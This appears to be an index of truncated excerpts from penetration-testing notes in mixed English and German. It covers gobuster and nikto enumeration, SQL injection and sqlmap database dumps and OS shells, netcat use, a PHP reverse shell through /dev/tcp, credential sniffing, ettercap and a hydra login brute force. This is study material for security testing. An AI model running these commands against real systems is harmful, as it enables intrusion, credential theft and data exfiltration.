-
Directory enumeration Hints: General search nikto -host $victim gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/…
-
Union-based injections Blind SQL injections If no output is given from a statement, try to use time-based approaches. Enumerating in inserts Assuming the INSERT statement is INSERT INTO $tablename (email,name) VALUES ("email", "name"); Then try a timing attack to determine if a certain value is in a field: INSERT INTO newsletter (name,email) VALUES ('name', ' ' AND…
-
See a packet in its context Kontextmenü, Follow auswählen Show only ICMP packets from a host tcpdump host 10.11.1.128 and icmp -i tun0 Show other systems communicating outside the own address ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr Record audio Wireshark can transform captured audio…
-
Namenskonfusion Datei ausliefern: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Datei anfragen über SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Gebe Ausgabe von Programm zurück: ncat -l localhost 3000 --exec /bin/date Datei direkt übertragen (unverschlüsselt!): 1. Empfänger: user@host02:~$ ncat -l > aha oder nc -nlvp 4444…
-
IF THE METERPRETER SHELL STUCKS, TRY TO ENTER ENTER MULTIPLE TIMES ON THE VICTIM. Aufbauen Lausche auf einem System, dass erreicht werden kann z.B. mit nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] Initiiere dann die Verbindung vom Zielsystem. Hier ein Beispiel direkt in PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?> Anderes Beispiel, z.B. direkt in einer Konsole…
-
Standard case: $ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e More aggresive: Dump DB: sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5 sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables Get shell: sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell Use an existing HTTP request as template. E.g. store a request in a text file: POST /index.php HTT/1.1Header: value... Then, use sqlmap with this file request.txt: sqlmap -r…
-
Note that FTP doesn’t show hidden files! Try in Windows e.g “cd ProgramData”. Enumeration With nmap. Scans a network for ftp servers which allow anonymous access. nmap -v -p21 --script=ftp-anon.nse 10.11.1.1-254 FTP relays The FTP specification defines FTP relays. One FTP server can say to another FTP server to send files to another third-party server.…
-
General notes NC / Netcat Try netcat first on interesting ports or narrow port ranges to be more silent Network scan Choose a port which is probably open on systems on this network. E.g. 445 for Windows hosts or 22 for Linux hosts. for i in $(seq 1 254); do nc -zv -w 1 10.10.10.$i 445;…
-
Linux Detect IPv6 hosts There is no arp table like in Ethernet/IPv4. But we can simulate is as follows to list all neightbours / directly reachable hosts: ping6 -c 5 ff02::1%eth0 >/dev/null ip -6 neigh Bonus: ip neigh shows the IPv4 address resolution table like the arp command does. Detect IPv6 addresses for known IPv4 addresses Scenario:…
-
See also the Wireshark post PSnuffle Metasploit module; analyse the live traffic for credentials of various protocols. msf > use auxiliary/sniffer/psnuffle PCredz PCredz uses a PCAP file and extracts hashes and other credentials. pcredz -f dump.pcap Zeek GitHub — zeek/zeek: Zeek is a powerful network analysis framework that is much different from the typical IDS you…
-
Sniffing and live content filtering. Operation modes: Unified: sniffs all packets from one interface. Packets for an attack host are ending here, but are directly forwarded after receiving Bridget: Forwards traffic from one interface to another. Absolutely secret because there is really no one “between the cable” Usage ettercap OPTIONS TARGET1 TARGET2 Targets are defined as MAC/IPv4s/IPv6s/PORT…
-
Distributed port scanning. Install dnmap_client on many machines and install one dnsmap_server. The server controls the clients to split port scans. http://tools.kali.org/information-gathering/dnmap
-
Active Information Gathering tool. See http://tools.kali.org/information-gathering/dmitry
-
Analyses SSL https://github.com/nabla-c0d3/sslyze python ‑m sslyze –regular URL
-
Enumeration Github wpscan --url $target Maybe an API token could be useful — then, the WordPress Vulnerability Database is used. Login brute force hydra -l thinc -P best110.txt 10.11.1.234 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Check users: http://spectra.htb/main/?author=1 http://spectra.htb/main/?author=2 … Most beautiful wordpress plugin XSS injection If there is a way to inject code somewhere (e.g. via a plugin)…
-
Web server scanner ./nikto.pl ‑host <IP> scans a host and creates a report with details and possible vulnerabilities. Interesting parameters: -evasion [12345678AB] (see options) -mutate (see options) -Pause -Save -T (see options)